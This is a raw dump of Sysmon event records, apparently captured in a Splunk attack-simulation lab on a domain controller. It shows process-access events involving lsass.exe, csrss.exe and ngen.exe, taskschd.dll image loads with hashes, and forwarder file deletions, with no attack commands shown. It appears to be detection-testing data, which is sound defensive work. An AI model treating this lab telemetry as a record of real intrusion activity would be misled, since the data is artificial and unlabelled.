Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.358{A7A01FEF-EBD0-607E-E30B-00000000BB01}52606888C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-E20B-00000000BB01}1772c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.358{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-E30B-00000000BB01}5260C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x800000000000000073679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.358{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28B831A797A9BFEC9DAC8E4CEFE53E0E,SHA256=3D3DAE397AF36741DDD1086ACC803B40CA3933DDA8B367A29D152246F9EF32DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.358{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22C48A6F8E86EA3D0F9CCD871E290E47,SHA256=D7D98176F7AEBAEB6F3C909B0B382B2E16CBE88BDDD1FC189493C0C1113CDFBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.343{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-E20B-00000000BB01}1772c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.343{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-E20B-00000000BB01}1772c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.343{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-E00B-00000000BB01}6084c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.343{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-E00B-00000000BB01}6084c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.343{A7A01FEF-EBD0-607E-E00B-00000000BB01}6084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.327{A7A01FEF-EBD0-607E-E10B-00000000BB01}48166948C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-E00B-00000000BB01}6084c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.311{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-E10B-00000000BB01}4816C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.311{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-E00B-00000000BB01}6084c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.311{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-E00B-00000000BB01}6084c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.296{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-DE0B-00000000BB01}4924c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.296{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-DE0B-00000000BB01}4924c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.296{A7A01FEF-EBD0-607E-DE0B-00000000BB01}4924C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.280{A7A01FEF-EBD0-607E-DF0B-00000000BB01}66963076C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-DE0B-00000000BB01}4924c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.265{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-DF0B-00000000BB01}6696C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.265{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-DE0B-00000000BB01}4924c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.265{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-DE0B-00000000BB01}4924c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.249{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-DC0B-00000000BB01}4320c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.249{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-DC0B-00000000BB01}4320c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.249{A7A01FEF-EBD0-607E-DC0B-00000000BB01}4320C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.233{A7A01FEF-EBD0-607E-DD0B-00000000BB01}69006892C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-DC0B-00000000BB01}4320c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.233{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-DD0B-00000000BB01}6900C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.233{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-DB0B-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.233{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-DB0B-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.233{A7A01FEF-EBD0-607E-DB0B-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.218{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-DC0B-00000000BB01}4320c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.218{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-DC0B-00000000BB01}4320c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.218{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-D90B-00000000BB01}6392c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 